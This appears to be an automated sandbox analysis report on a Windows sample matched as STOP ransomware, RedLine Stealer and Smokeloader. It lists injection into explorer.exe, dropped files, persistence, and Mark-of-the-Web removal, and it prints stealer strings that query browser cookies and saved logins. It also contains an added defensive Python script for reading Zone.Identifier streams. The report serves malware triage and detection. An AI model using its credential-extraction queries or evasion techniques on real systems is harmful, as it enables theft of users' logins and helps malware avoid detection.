Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.537288789.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.615454520.00000000005A0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000000.535019814.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.405852892.0000000000758000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000000.532065497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: ECFD.exe PID: 5920, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040E958 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: String function: 0040E958 appears 36 times
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: String function: 0040E958 appears 36 times
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040156B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402241 NtQuerySystemInformation, 0_2_00402241
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040224D NtQuerySystemInformation, 0_2_0040224D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402251 NtQuerySystemInformation, 0_2_00402251
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401577
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402219 NtQuerySystemInformation, 0_2_00402219
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040221B NtQuerySystemInformation, 0_2_0040221B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401727 NtMapViewOfSection,NtMapViewOfSection, 0_2_00401727
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401581 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401581
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401584 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401584
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401587
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_004015EF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_004015EF
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0040160A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_0040160A
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0040160E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_0040160E
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0040161D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_0040161D
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_004015FB
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0040158A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_0040158A
Source: file.exe Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: F4FD.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: 857.exe.1.dr Static PE information: Resource name: RT_VERSION type: VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79
Source: 3804.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: udgatra.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: tfgatra.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: A28F.exe.1.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_EXPORT size: 0x100 address: 0x0
Source: 9763.exe.1.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_EXPORT size: 0x100 address: 0x0
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\tfgatra
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@26/25@55/12
Source: C:\Users\user\AppData\Local\Temp\857.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\tfgatra C:\Users\user\AppData\Roaming\tfgatra
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\ECFD.exe C:\Users\user\AppData\Local\Temp\ECFD.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F4FD.exe C:\Users\user\AppData\Local\Temp\F4FD.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\857.exe C:\Users\user\AppData\Local\Temp\857.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2A57.exe C:\Users\user\AppData\Local\Temp\2A57.exe
Source: C:\Users\user\AppData\Local\Temp\ECFD.exe Process created: C:\Users\user\AppData\Local\Temp\ECFD.exe C:\Users\user\AppData\Local\Temp\ECFD.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3804.exe C:\Users\user\AppData\Local\Temp\3804.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\543.exe C:\Users\user\AppData\Local\Temp\543.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EAA.exe C:\Users\user\AppData\Local\Temp\EAA.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\3804.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 812 -s 520
Source: C:\Users\user\AppData\Local\Temp\543.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 532
Source: unknown Process created: C:\Users\user\AppData\Roaming\udgatra C:\Users\user\AppData\Roaming\udgatra
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\EB37.tmp
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: EAA.exe, 0000000C.00000003.530577101.0000000000651000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT origin_url,action_url,username_element,username_value,password_element,hex(password_value) password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for FROM logins;
Source: EAA.exe, 0000000C.00000003.530577101.0000000000651000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT origin_url,action_url,username_element,username_value,password_element,hex(password_value) password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for FROM logins;_value,s
Source: 2A57.exe, 00000008.00000003.506766086.0000000000851000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.526693551.0000000002479000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_007CCC8D CreateToolhelp32Snapshot,Module32First, 6_2_007CCC8D
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess812
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4500
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\2A57.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\EAA.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\dobixuyapuxez\cohimu_88 jekumuhe\67.pdb source: F4FD.exe, 00000006.00000000.449000017.0000000000401000.00000020.00000001.01000000.00000008.sdmp, udgatra, 00000015.00000002.602489552.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, udgatra, 00000015.00000000.543137145.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: C:\topefife94\vafivesobuvo12\nugotelosowos\jiwewoha.pdb source: file.exe
Source: Binary string: #+C:\dobixuyapuxez\cohimu_88 jekumuhe\67.pdb source: F4FD.exe, 00000006.00000000.449000017.0000000000401000.00000020.00000001.01000000.00000008.sdmp, udgatra, 00000015.00000002.602489552.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, udgatra, 00000015.00000000.543137145.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: .C:\topefife94\vafivesobuvo12\nugotelosowos\jiwewoha.pdb source: file.exe
Source: Binary string: ]C:\setupipayadewu\gala\muhoci-yileyowip71.pdb source: ECFD.exe, 00000005.00000000.443846038.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe, 00000009.00000000.486986085.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe.1.dr
Source: Binary string: C:\feyiguha\pelejitahuhufe14 gewofaj.pdb source: 543.exe, 0000000B.00000000.489003730.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\setupipayadewu\gala\muhoci-yileyowip71.pdb source: ECFD.exe, 00000005.00000000.443846038.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe, 00000009.00000000.486986085.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe.1.dr
Source: Binary string: MC:\ziradevetu84\faduxusiyipa29\jigi.pdb( source: 3804.exe, 0000000A.00000000.485964331.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: CC:\feyiguha\pelejitahuhufe14 gewofaj.pdb source: 543.exe, 0000000B.00000000.489003730.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\ziradevetu84\faduxusiyipa29\jigi.pdb source: 3804.exe, 0000000A.00000000.485964331.0000000000401000.00000020.00000001.01000000.0000000B.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\tfgatra Unpacked PE file: 4.2.tfgatra.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Unpacked PE file: 6.2.F4FD.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409834 push eax; ret 0_2_00409852
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E99D push ecx; ret 0_2_0040E9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B243 push ecx; ret 0_2_0040B256
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00601890 push cs; retf 0_2_0060189C
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_00401829 push cs; retf 4_2_00401835
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_00409834 push eax; ret 4_2_00409852
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_0040E99D push ecx; ret 4_2_0040E9B0
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_0040B243 push ecx; ret 4_2_0040B256
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_00409834 push eax; ret 6_2_00409852
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0040E99D push ecx; ret 6_2_0040E9B0
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0040B243 push ecx; ret 6_2_0040B256
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_007D2937 push 0000002Ch; retf 6_2_007D2939
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_007D1E17 push eax; ret 6_2_007D1E18
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_007D2785 pushad ; iretd 6_2_007D2786
Source: EAA.exe.1.dr Static PE information: section name: _RDATA
Source: EAA.exe.1.dr Static PE information: section name: .vmp0
Source: EAA.exe.1.dr Static PE information: section name: .vmp1
Source: 2A57.exe.1.dr Static PE information: section name: _RDATA
Source: 2A57.exe.1.dr Static PE information: section name: .vmp0
Source: 2A57.exe.1.dr Static PE information: section name: .vmp1
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1

Persistence and Installation Behavior

Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\udgatra
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\tfgatra
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\857.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2A57.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\ECFD.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\EB37.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\EAA.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\F4FD.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3804.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\9763.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\B03C.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\543.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A28F.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\tfgatra:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\udgatra:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (16 identical events)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (20 identical events)
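The two "File opened: ...:Zone.Identifier read attributes | delete" events above are the injected explorer.exe stripping the Mark-of-the-Web from the persisted copies (tfgatra, udgatra), which is what the "Hides that the sample has been downloaded from the Internet" signature refers to. The following Python is an added example, not code from the report or from the sample: it parses the ZoneTransfer stream body and reads it from a file through the NTFS ':Zone.Identifier' path syntax, so an analyst can check whether a dropped executable still carries its download provenance. The sample stream text is constructed; the zone numbering (0 local machine to 4 restricted sites) is the standard URL security zone table.

```python
"""Added example (not part of the report): read and interpret the Mark-of-the-Web
stream that the injected explorer.exe deletes from its dropped copies.

Windows records download provenance in an NTFS alternate data stream named
Zone.Identifier whose body is INI text ([ZoneTransfer] / ZoneId=3 / ...).
Deleting that stream makes a downloaded file indistinguishable from a locally
created one, so SmartScreen and protected-view checks keyed on ZoneId no
longer apply. SAMPLE_STREAM below is constructed, not taken from the report.
"""
import configparser
import sys

# URL security zones as used in ZoneId; 3 (Internet) and 4 (Restricted sites)
# are the values that trigger download-origin warnings.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}

# Constructed sample of a typical browser-written stream (example.invalid URLs).
SAMPLE_STREAM = (
    "[ZoneTransfer]\n"
    "ZoneId=3\n"
    "ReferrerUrl=https://example.invalid/\n"
    "HostUrl=https://example.invalid/file.exe\n"
)


def parse_zone_identifier(stream_text):
    """Parse a Zone.Identifier stream body.

    Returns a dict with zone id/name, referrer and host URLs and a
    from_internet flag, or None when the text is not a ZoneTransfer block."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(stream_text)
        zone = int(cp.get("ZoneTransfer", "ZoneId"))
    except (configparser.Error, ValueError):
        return None
    return {
        "zone_id": zone,
        "zone_name": ZONE_NAMES.get(zone, "Unknown"),
        "referrer": cp.get("ZoneTransfer", "ReferrerUrl", fallback=None),
        "host_url": cp.get("ZoneTransfer", "HostUrl", fallback=None),
        "from_internet": zone >= 3,
    }


def read_motw(path):
    """Return the parsed MOTW of a file, or None if it has none.

    The stream is opened via the 'file:Zone.Identifier' path syntax, which only
    exists on NTFS under Windows; on other platforms, or when the stream has
    been deleted as in this report, the open fails and None is returned."""
    if sys.platform != "win32":
        return None
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8",
                  errors="replace") as stream:
            return parse_zone_identifier(stream.read())
    except OSError:
        return None


def triage_dropped_file(path):
    """Verdict for an executable found under a user-writable directory:
    'downloaded' when the MOTW says Internet/Restricted zone, 'no MOTW' when
    the stream is absent. A download whose stream was stripped, as the
    report shows for tfgatra and udgatra, looks exactly like a local file."""
    info = read_motw(path)
    if info is None:
        return "no MOTW"
    if info["from_internet"]:
        return "downloaded"
    return "local (zone %d)" % info["zone_id"]
```

Because the stripped copies return "no MOTW", absence of the stream is not evidence of local origin; the File opened events in the report, or the corresponding object-access audit on the stream, are the reliable signal.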

Malware Analysis System Evasion

Source: F4FD.exe, 00000006.00000002.523107816.00000000007D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
